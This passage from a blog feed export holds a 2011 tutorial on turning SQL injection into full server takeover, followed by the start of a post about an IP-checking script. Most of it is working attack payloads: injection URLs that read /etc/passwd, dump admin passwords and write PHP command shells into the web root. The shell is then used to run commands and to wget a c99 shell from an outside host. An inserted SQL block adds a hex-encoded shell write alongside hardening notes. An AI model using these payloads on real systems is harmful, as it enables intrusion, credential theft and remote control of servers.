href="http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file(‘path/to/file’),3,4,5"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file(‘path/to/file’),3,4,5&lt;/a&gt;--&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Simply replace ‘path/to/file’ with the path to the file you want to read, like 
this&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file('etc/passwd'),3,4,5"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file('etc/passwd'),3,4,5&lt;/a&gt;--&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;SAMPLE IMAGE&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img534.imageshack.us/img534/6704/58943482.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://img534.imageshack.us/img534/6704/58943482.png" t$="true" width="397" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Also helpful to look for "/etc/hosts", "/etc/group", or possibly "C:\boot.ini" on Windows OS. You can use one to your liking, explore your own, just be aware that much like the table names this will need to be HEX'd from time to time to bypass filters and restrictions so results can be properly displayed.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;SAMPLE IMAGE - /ETC/GROUP&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img707.imageshack.us/img707/3914/44126305.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://img707.imageshack.us/img707/3914/44126305.png" t$="true" width="392" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;SAMPLE IMAGE - /ETC/HOSTS:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img228.imageshack.us/img228/3433/48756495.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="367" src="http://img228.imageshack.us/img228/3433/48756495.png" t$="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: Calibri;"&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;INTO OUTFILE &amp;amp; INTO DUMPFILE:&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Now we will use INTO_OUTFILE() &amp;amp; INTO_DUMPFILE() for all that they offer and try to root the target server by uploading a shell via SQL injection, remember the whole point of this is to show you how to do it without having to even step foot in the admin panel. These two options allow you to either take the contents from a column &amp;amp; place them in a nice text file for cleanliness purposes, OR we can use it to upload a php script of our choice that we could then use to perform a remote file inclusion, cmd execution, or whatever else you can think of.&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE&lt;/b&gt;: You CAN NOT overwrite existing files on the target system with these methods and in general it requires Magice_quotes_gpc to be disabled. Also be aware that HEX() and CHAR() won’t work for this like it does in other circumstances (mainly table_name &amp;amp; LOAD_FILE()). The last warning is that you must ensure that INTO OUTFILE is the last statement of your request or query.&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;OK so first we can use INTO_DUMPFILE() to dump the contents of a column into a text file. If we do it correctly we can dump the results into a area on the webserver that we can then check afterwards to find the results. If for example we wanted to take the password column from the admin table and place the content into a file it would look like this:&lt;/div&gt;&lt;div class="MsoListParagraph" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+1,passwd,3,4,5+FROM+admin+INTO+DUMPFILE+’/path/on/target/file.txt’"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+1,passwd,3,4,5+FROM+admin+INTO+DUMPFILE+’/path/on/target/file.txt’&lt;/a&gt;—&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE&lt;/b&gt;: You can use INTO_OUTFILE &amp;amp; INTO_DUMPFILE fairly interchangeable, but to avoid splitting chars between the data, we will use INTO DUMPFILE instead of INTO OUTFILE. &lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;This will take the “passwd” column and will extract its full contents and place it in the new file created by our dumpfile argument, called “filed.txt”. Once you have run this query you can point your favorite browser at the designated web folder location to see the contents of your file you just created. If we wanted to take this even further you can use this same method but replace the column you are dumping with your own code. You can sue this approach to upload a .php backdoor, or perhaps upload some purposefully vulnerable code to allow remote file inclusion to get more privileged shell, or maybe you only need a simple php command shell to do your thing. All are possible and it works like this:&lt;/div&gt;&lt;div class="MsoListParagraph" style="margin: 0in 0in 10pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+null,’CODE’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+null,’CODE’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’&lt;/a&gt;—&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE&lt;/b&gt;: You need to null the column numbers when using this method to avoid writing numbers to our files. Whatever you place where CODE is, is what will be written to the evil.php file that is created. This may require that the PHP safe_mode be turned off. Depending on OS and PHP version you can bypass the safe_mode restrictions. 
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;A few deadly examples:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+null,'"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+null,'&lt;/a&gt;&amp;lt;? system($_GET['c']); ?&amp;gt;’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT&lt;/a&gt;+"&amp;lt;? 
system($_REQUEST['cmd']); ?&amp;gt;",2,3,4 INTO+OUTFILE+“/var/www/html/temp/evil.php" --&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;these are simple PHP CMD shells which would allow you to issue some basic commands on the target server. To use, just open URL to new file and change the trailing part of URL to your desired command and watch the page refresh with your results displayed&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 112.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/temp/evil.php?c=&amp;lt;insert-command-here"&gt;http://www.site.com/temp/evil.php?c=&amp;lt;insert-command-here&lt;/a&gt;&amp;gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 112.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/temp/evil.php?c=id"&gt;http://www.site.com/temp/evil.php?c=id&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 
0pt 180.35pt; mso-add-space: auto; mso-list: l0 level4 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;check system id&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 112.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/temp/evil.php?c=cat"&gt;http://www.site.com/temp/evil.php?c=cat&lt;/a&gt; /var/www/index.php&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 180.35pt; mso-add-space: auto; mso-list: l0 level4 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;check the code for index page to see if we can find the default credentials being used to make connections, as well as getting some info on directory structure perhaps&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 112.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font: 7pt 
&amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/temp/evil.php?c=wget"&gt;http://www.site.com/temp/evil.php?c=wget&lt;/a&gt; &lt;a href="http://www.example.com/c99.php"&gt;http://www.example.com/c99.php&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 180.35pt; mso-add-space: auto; mso-list: l0 level4 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;use wget to download remote shell for upgraded privileges and further rooting of the target server&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+null"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+null&lt;/a&gt;, ‘&amp;lt;? 
phpinfo(); ?&amp;gt;’ ,null,null,null+INTO +DUMPFILE+’/path/on/target/evil.php’—&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;This will give you a lot of information relating to the target server’s current configuration&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
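&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;The block below is an added example and not code from the original post. It shows the INTO DUMPFILE shell write as mysqld executes it, the difference from INTO OUTFILE that decides whether the written PHP is intact, the errors that explain a refused write, and the settings that shut the technique off. The path /var/www/html/temp/, the username column of the admin table, and the account webapp@localhost are assumptions for illustration; the five-column layout is the one used on this page.&lt;/div&gt;

```sql
-- Added example, not from the original post. Shows the INTO DUMPFILE write from
-- the database side on a MySQL 5.x server. Assumes an Apache/PHP host where
-- /var/www/html/temp/ is both served by the web server and writable by the
-- mysql user, an 'admin' table with username and passwd columns, and the
-- account 'webapp'@'localhost'; the five-column layout is the one used on
-- this page. Everything else here is standard MySQL behaviour.

-- 1. The shell write. The fillers are NULL so nothing but the code lands in
--    the file. The code itself is passed as a hex literal: only the file name
--    has to be a quoted string, the content does not, so this version has no
--    quotes at all to be filtered. The bytes decode to the one-line PHP shell
--    from the post, system($_GET["c"]) between PHP open and close tags.
SELECT NULL, 0x3C3F7068702073797374656D28245F4745545B2263225D293B203F3E, NULL, NULL, NULL
  INTO DUMPFILE '/var/www/html/temp/evil.php';

-- 2. Check the bytes that reached disk. DUMPFILE writes the row raw, so the
--    comparison returns 1. INTO OUTFILE would have written \N for each NULL
--    filler, a tab between columns, a newline at the end, and would have
--    backslash-escaped any tab, newline or backslash inside the code.
SELECT LOAD_FILE('/var/www/html/temp/evil.php')
       = 0x3C3F7068702073797374656D28245F4745545B2263225D293B203F3E AS intact;

-- 3. Errors you will see when the write is refused, and what each means:
--    1227  Access denied; you need the FILE privilege         : account lacks FILE
--    1290  ... running with the --secure-file-priv option ...  : path outside secure_file_priv
--    1086  File '/var/www/html/temp/evil.php' already exists   : never overwrites; choose a new name
--    1172  Result consisted of more than one row                : DUMPFILE takes exactly one row
--    1     Can't create/write to file ... (Errcode: 13)         : directory not writable by the mysql user

-- 4. Dumping many rows. DUMPFILE refuses them, so either switch to OUTFILE
--    (one line per row, tabs between columns) or collapse the rows first.
--    GROUP_CONCAT() is cut off at group_concat_max_len (1024 bytes by default).
SELECT NULL, GROUP_CONCAT(username, ':', passwd SEPARATOR '\n'), NULL, NULL, NULL
  FROM admin
  INTO DUMPFILE '/var/www/html/temp/admins.txt';

-- 5. Hardening. Either of the first two stops both the write here and the
--    LOAD_FILE() read; the third removes the target even if they are missed.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
-- my.cnf, [mysqld] section:  secure_file_priv = /var/lib/mysql-files
-- chown root:root /var/www/html/temp and drop group/world write, so the mysql user cannot create files there
```

&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Passing the PHP as a hex literal (step 1) is the way around the quote problem on the content side; the file name after INTO DUMPFILE is the one place where a quoted literal is unavoidable, which is why magic_quotes_gpc matters for this technique and not for LOAD_FILE(). Step 2 is also how you confirm, from the SQL side alone, that the write happened before you go looking for the file in a browser.&lt;/div&gt;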
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Once last trick to show you is that you can actually combine both the LOAD_FILE() &amp;amp; INTO_DUMPFILE() to obtain useful information from the target server. This essentially puts a copy of a file into usable web page for you to easily grab and read. Here is an example of how it might be used:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+LOAD_FILE(‘/etc/passwd’),null+INTO+DUMPFILE+’/path/on/target/dump.php’"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+LOAD_FILE(‘/etc/passwd’),null+INTO+DUMPFILE+’/path/on/target/dump.php’&lt;/a&gt;—&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.site.com/index.php?id=-725+UNION+SELECT+HEX(LOAD_FILE(‘/etc/passwd’)),null+INTO+DUMPFILE+’/path/on/target/dump.php’"&gt;http://www.site.com/index.php?id=-725+UNION+SELECT+HEX(LOAD_FILE(‘/etc/passwd’)),null+INTO+DUMPFILE+’/path/on/target/dump.php’&lt;/a&gt;—&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 10pt 1in; mso-add-space: auto; mso-list: l0 
level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;might require you to decrypt it but if it helps you to bypass filters and restrictions then so be it. You can try PHP charset encoders to get this done. &lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;That brings this to a close on how to use LOAD_FILE and INTO_DUMPFILE to turn a standard SQL Injection into full target system takeover. I hope you have enjoyed this, and until next time Enjoy!&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;H.R.&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-5863178670423708574?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5WWM5Wp0BfGb29Wea_rVuM3riFs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5WWM5Wp0BfGb29Wea_rVuM3riFs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5WWM5Wp0BfGb29Wea_rVuM3riFs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5WWM5Wp0BfGb29Wea_rVuM3riFs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/akdaCVSfu9g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/5863178670423708574/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/08/sql-injection-how-to-use-load-file-into.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5863178670423708574?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5863178670423708574?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/akdaCVSfu9g/sql-injection-how-to-use-load-file-into.html" title="SQL Injection: How to use LOAD FILE &amp; INTO DUMPFILE" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/08/sql-injection-how-to-use-load-file-into.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DU8NR34yfCp7ImA9WhdSGEU.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-2211187121367627043</id><published>2011-07-28T16:18:00.000-05:00</published><updated>2011-07-28T16:18:16.094-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-28T16:18:16.094-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="IP Checker" /><category scheme="http://www.blogger.com/atom/ns#" term="IP Address" /><category scheme="http://www.blogger.com/atom/ns#" term="IP Locator" 
/><category scheme="http://www.blogger.com/atom/ns#" term="IP" /><category scheme="http://www.blogger.com/atom/ns#" term="VPN Checker" /><category scheme="http://www.blogger.com/atom/ns#" term="IP Verification" /><category scheme="http://www.blogger.com/atom/ns#" term="How to check External IP" /><category scheme="http://www.blogger.com/atom/ns#" term="IP Validator" /><category scheme="http://www.blogger.com/atom/ns#" term="Whats my IP" /><category scheme="http://www.blogger.com/atom/ns#" term="Whatsmyip.py" /><category scheme="http://www.blogger.com/atom/ns#" term="Proxy Checker" /><category scheme="http://www.blogger.com/atom/ns#" term="Check IP" /><title>CHECKING YOUR EXTERNAL IP FROM COMMAND LINE</title><content type="html">&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I often find myself working from the command line in a terminal or console when conducting security tests, wondering whether my proxy or VPN is really carrying the traffic of my command line tools. It is easy enough to check from a browser, but that means leaving the console and opening a browser, which of course I am too lazy to do. In my search to keep everything on the command line I found this gem of a Python script that does exactly what I had been looking for, and I had to share it with you. It is called "whatsmyip.py". I did not write it, but it is a neat piece of Python and simple to use. If you place the script in a directory on your PATH you can run it from anywhere on the command line, letting us quickly check our external IP and confirm that our HTTP proxy or VPN is working for our CLI tools. No more need to leave the console! You can always use ipconfig/ifconfig to check your internal IP from the command line; now you can check your external IP as well. One caveat: the script only proves that its own HTTP request left through the proxy or VPN. Other tools have to honor the same proxy settings (the http_proxy and https_proxy environment variables, for example), and a VPN that does not also route DNS can still leak your resolver's address, so check each tool you care about rather than assuming.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;It is as simple as saving the code provided below as "&amp;lt;insert-name&amp;gt;.py" on your system and then running it as "name.py" OR "python name.py". It will grab your external IP and return the result to the console. It is super easy and really helpful. It won't do anything else, but it does what it is supposed to and makes another fine addition to any pen-tester's bag of tricks. Hope you find this helpful in some way, and as always Enjoy!&lt;/span&gt;&lt;/div&gt;&lt;div 